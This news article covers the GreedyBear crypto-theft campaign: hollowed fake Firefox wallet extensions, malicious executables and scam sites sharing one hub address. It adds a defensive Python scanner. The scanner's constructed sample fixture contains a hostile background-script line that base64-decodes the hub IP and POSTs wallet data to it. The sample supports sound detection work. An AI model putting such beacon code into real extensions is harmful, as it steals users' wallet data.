GreedyBear: 40 Fake Crypto Wallet Extensions Found on Firefox Marketplace

A sophisticated and large-scale cybercrime campaign, named GreedyBear, has been exposed for stealing at least a million dollars from cryptocurrency users. The research, carried out by cybersecurity firm Koi Security and shared with Hackread.com, reveals a highly organised operation that goes far beyond typical online scams.
Instead of relying on a single type of attack, the criminals behind GreedyBear are running a coordinated mix of malicious browser extensions, malicious executables, and fake websites. Working from several angles at once means a victim who avoids one lure can still be caught by another, which is what makes the operation so effective.
One of the main ways GreedyBear operates is through malicious browser extensions. The group has created over 150 fake extensions for the Firefox marketplace, pretending to be popular crypto wallets like MetaMask, TronLink, Exodus, and Rabby Wallet.
To get past the marketplace's security checks, the attackers use a technique the researchers call "Extension Hollowing". They first upload harmless extensions and build up credibility with fake positive reviews. Once a listing looks trustworthy, they hollow it out: a later update changes the name and icon to impersonate a wallet and injects the malicious code, while the listing keeps its accumulated review history. The practical consequence is that a high rating and a long review history are not, on their own, evidence that an extension is safe.
The second method involves almost 500 malicious executables distributed through sites offering pirated software. These include credential stealers, which harvest login information, and ransomware, which encrypts files and demands payment. The variety of tooling shows the group is not limited to one technique but has a wide range of methods for targeting victims.
Thirdly, the group has set up dozens of fake websites that look like legitimate crypto services or wallet repair tools. These sites are designed to trick users into entering personal information and wallet details.
A key detail in Koi Security's research is that all of these attacks, the fake extensions, the malware, and the scam websites, connect back to a single server at 185.208.156.66. This central hub lets the attackers manage the whole operation efficiently, and it also gives defenders one address that is worth blocking at the network edge and hunting for in extension code and proxy logs.
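The two concrete things a defender can act on here are the single hub address and the fact that a hollowed extension's malicious code ships in the extension's own files. The following Python is an added example, not code from Koi Security, Hackread, or the campaign itself: it checks unpacked extension sources for the published address (in the clear or hidden in a base64 literal) and scans proxy log lines for requests to it. The sample extension files, the base64 obfuscation, and the log line format are constructed for illustration; only the IP address comes from the report.

```python
import base64
import ipaddress
import re
from typing import Dict, Iterable, List, Tuple
from urllib.parse import urlsplit

# The one network indicator the report gives: the hub that the fake
# extensions, the pirated-software executables and the scam sites share.
GREEDYBEAR_C2 = frozenset({"185.208.156.66"})

# Dotted quad not glued to other digits or dots; validity is checked separately.
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Runs that look like base64 literals. Hiding the address this way is an
# assumption for the example, not a behaviour the report describes.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _valid_ipv4(s: str) -> bool:
    try:
        ipaddress.IPv4Address(s)
        return True
    except ValueError:
        return False


def find_indicator_ips(text: str, indicators=GREEDYBEAR_C2) -> List[str]:
    """Indicator IPs present in text, either in the clear or inside base64 blobs."""
    chunks = [text]
    for blob in B64_RE.findall(text):
        try:
            chunks.append(base64.b64decode(blob, validate=True).decode("utf-8", "ignore"))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
    found: List[str] = []
    for chunk in chunks:
        for ip in IPV4_RE.findall(chunk):
            if _valid_ipv4(ip) and ip in indicators and ip not in found:
                found.append(ip)
    return found


def audit_extension(files: Dict[str, str], indicators=GREEDYBEAR_C2) -> List[Tuple[str, str]]:
    """(path, ip) for every file of an unpacked extension that embeds an indicator."""
    return [(path, ip) for path, content in files.items()
            for ip in find_indicator_ips(content, indicators)]


def scan_proxy_log(lines: Iterable[str], indicators=GREEDYBEAR_C2) -> List[Tuple[str, str, str]]:
    """(timestamp, client, url) for each request whose host is an indicator IP.
    Assumed line format: '<timestamp> <client-ip> <method> <url>'."""
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, _method, url = parts
        if (urlsplit(url).hostname or "") in indicators:
            hits.append((ts, client, url))
    return hits


# Constructed sample: a hollowed extension whose manifest now claims to be
# MetaMask and whose background script beacons to the hub, plus a benign
# control extension that should produce no hits.
SAMPLE_EXTENSIONS = {
    "metamask-lookalike/manifest.json":
        '{"name": "MetaMask", "version": "3.1.0", "permissions": ["storage", "<all_urls>"]}',
    "metamask-lookalike/background.js":
        'const h = atob("MTg1LjIwOC4xNTYuNjY=");\n'
        'fetch("http://" + h + "/collect", {method: "POST", body: JSON.stringify(wallet)});',
    "benign-notes/manifest.json":
        '{"name": "Notes", "version": "1.0.0", "permissions": ["storage"]}',
    "benign-notes/background.js":
        'browser.storage.local.set({started: Date.now()});',
}

# Constructed proxy log lines in the assumed format.
SAMPLE_PROXY_LOG = [
    "2025-08-07T10:01:02Z 10.0.0.12 GET https://addons.mozilla.org/en-US/firefox/",
    "2025-08-07T10:01:09Z 10.0.0.12 POST http://185.208.156.66/collect",
    "2025-08-07T10:02:30Z 10.0.0.15 GET https://example.com/",
]

if __name__ == "__main__":
    for path, ip in audit_extension(SAMPLE_EXTENSIONS):
        print(f"[extension] {path}: embeds hub address {ip}")
    for ts, client, url in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"[proxy] {ts} {client} -> {url}")
```

Run against real data, `audit_extension` would be fed the files of each unpacked `.xpi` from a Firefox profile, and `scan_proxy_log` the egress proxy's logs. A single IP is a brittle indicator, since the operators can move the hub at any time, so this check complements, rather than replaces, reviewing what an extension update actually changed.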
Researchers note that this campaign, which started as a smaller effort known as Foxy Wallet, has now grown into a major multi-platform threat, with signs that it could soon expand to other browsers like Chrome and Edge.
Researchers also noted that crime at this scale and level of automation is likely made possible by new AI tools, which make it faster and easier than ever for criminals to produce and launch attacks. In that environment, relying on traditional trust signals such as store ratings and review history is no longer enough to stay safe online.
HackRead